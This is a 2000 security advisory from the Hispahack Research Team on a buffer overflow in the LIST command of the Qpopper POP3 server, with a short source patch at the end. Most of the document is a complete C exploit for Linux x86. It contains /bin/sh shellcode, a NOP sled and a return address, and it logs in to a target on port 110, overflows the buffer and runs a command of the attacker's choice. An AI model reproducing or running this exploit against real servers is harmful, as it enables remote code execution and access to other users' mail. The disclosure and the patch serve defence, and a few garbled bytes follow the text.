!Hispahack Research Team http://hispahack.ccc.de Program: Qpopper <= 3.0beta29 (2.53 and olders are not vulnerable) Platform: *nix Risk: Remote access Author: Zhodiac Date: 20/1/2000 - Problem: =========== The, nowadays, so common qpop pop3 server is one of the best server which implements some features added not in normal pop3d. Like almost all software it has some security bugs. In this case, once you pass the login process you can execute malicious code due to a buffer overflow. With this buffer overflow (second argument of the LIST command) you can execute malicious code with the uid of the user you logged in, and with gid mail. Due to have gid mail, in some systems you can read all the mail of other users and even change/delete it. - Exploit: ========== For proof of vulnerability we release the Linux x86 xploit. But be aware, no public xploit for your system does not mean you can't be hacked. Vulnerability exists, fix it! ------- qpop-xploit.c ---------- Modified by missnglnk Allows you to specify the command to execute and added network support so netcat, is no longer needed. /* * !Hispahack Research Team * http://hispahack.ccc.de * * By Zhodiac * * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53) * Overflow at pop_list()->pop_msg() * * Tested: 3.0beta28 offset=0 * 3.0beta26 offset=0 * 3.0beta25 offset=0 * * #include * * This code is dedicated to my love [CrAsH]] and to all the people who * were raided in Spain in the last few days. * * Madrid 10/1/2000 * * missnglnk * - Allows you to specify the command to execute on the remote host, * and added network support to the program so you do not need netcat * to use this. */ #include #include #include #include #include #include #include #include #define BUFFERSIZE 1004 #define NOP 0x90 #define OFFSET 0xbfffd9c4 // #define OFFSET 0x0 char shellcode[]= "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89" "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh"; void usage(char *progname) { fprintf(stderr,"Usage: (%s []\n",progname); exit(1); } int main(int argc, char **argv) { char *ptr,buffer[BUFFERSIZE],rcvbuf[4096],username[128],password[128],exploit[4096],command[4096]; unsigned long *long_ptr,offset=OFFSET; int aux,sock; struct sockaddr_in sin; unsigned long ip; struct hostent *he; fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n"); fprintf(stderr,"Qpopper xploit by Zhodiac \n\n"); if (argc<5) usage(argv[0]); if (argc==6) offset+=atol(argv[5]); ptr=buffer; memset(ptr,0,sizeof(buffer)); memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16); ptr+=sizeof(buffer)-strlen(shellcode)-16; memcpy(ptr,shellcode,strlen(shellcode)); ptr+=strlen(shellcode); long_ptr=(unsigned long*)ptr; for(aux=0;aux<4;aux++) *(long_ptr++)=offset; ptr=(char *)long_ptr; *ptr='\0'; fprintf(stderr,"Buffer size: %d\n",strlen(buffer)); fprintf(stderr,"Offset: 0x%lx\n\n",offset); snprintf(username, sizeof(username), "USER %s\n",argv[2]); snprintf(password, sizeof(password), "PASS %s\n",argv[3]); snprintf(exploit, sizeof(exploit), "LIST 1 %s\n",buffer); snprintf(command, sizeof(command), "%s\n", argv[4]); if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); return -1; } if ((he = gethostbyname(argv[1])) != NULL) { ip = *(unsigned long *)he->h_addr; } else { if ((ip = inet_addr(argv[1])) == NULL) { perror("inet_addr()"); return -1; } } sin.sin_family = AF_INET; sin.sin_addr.s_addr = ip; sin.sin_port = htons(110); if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("connect()"); return -1; } if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) { perror("read()"); return -1; } if (strstr(rcvbuf, "+OK") == NULL) { printf("Server didnt respond with ok\n"); rcvbuf[(strlen(rcvbuf) - 1)] = '\0'; printf("\t%s\n", rcvbuf); return -1; } rcvbuf[(strlen(rcvbuf) - 1)] = '\0'; printf("\t%s\n", rcvbuf); bzero(rcvbuf, sizeof(rcvbuf)); if (write(sock, username, strlen(username)) < strlen(username)) { perror("write()"); return -1; } if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) { perror("read()"); return -1; } if (strstr(rcvbuf, "+OK") == NULL) { printf("Server didnt respond with username ok\n"); rcvbuf[(strlen(rcvbuf) - 1)] = '\0'; printf("\t%s\n", rcvbuf); return -1; } rcvbuf[(strlen(rcvbuf) - 1)] = '\0'; printf("\t%s\n", rcvbuf); bzero(rcvbuf, sizeof(rcvbuf)); if (write(sock, password, strlen(password)) < strlen(password)) { perror("write()"); return -1; } if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) { perror("read()"); return -1; } if (strstr(rcvbuf, "+OK") == NULL) { printf("Server didnt respond with password ok\n"); rcvbuf[(strlen(rcvbuf) - 1)] = '\0'; printf("\t%s\n", rcvbuf); return -1; } rcvbuf[(strlen(rcvbuf) - 1)] = '\0'; printf("\t%s\n", rcvbuf); bzero(rcvbuf, sizeof(rcvbuf)); if (write(sock, exploit, strlen(exploit)) < strlen(exploit)) { perror("write()"); return -1; } if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) { perror("read()"); return -1; } rcvbuf[(strlen(rcvbuf) - 1)] = '\0'; printf("\t%s\n", rcvbuf); bzero(rcvbuf, sizeof(rcvbuf)); if (write(sock, command, strlen(command)) < strlen(command)) { perror("write()"); return -1; } if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) { perror("read()"); return -1; } rcvbuf[(strlen(rcvbuf) - 1)] = '\0'; printf("\t%s\n", rcvbuf); bzero(rcvbuf, sizeof(rcvbuf)); if (close(sock) < 0) { perror("close()"); return -1; } return(0); } ------- qpop-xploit.c --------- - Fix: ====== Best solution is to wait for a new patched version, meanwhile here you have a patch that will stop this attack (be aware that this patch was not done after a total revision of the code, maybe there are some other overflows). ------ pop_list.patch --------- 77c77 < return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s", --- > return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s", ------ pop_list.patch --------- piscis:~# patch pop_list.c pop_list.patch piscis:~# Spain r0x Greets :) Zhodiac

��ŷ��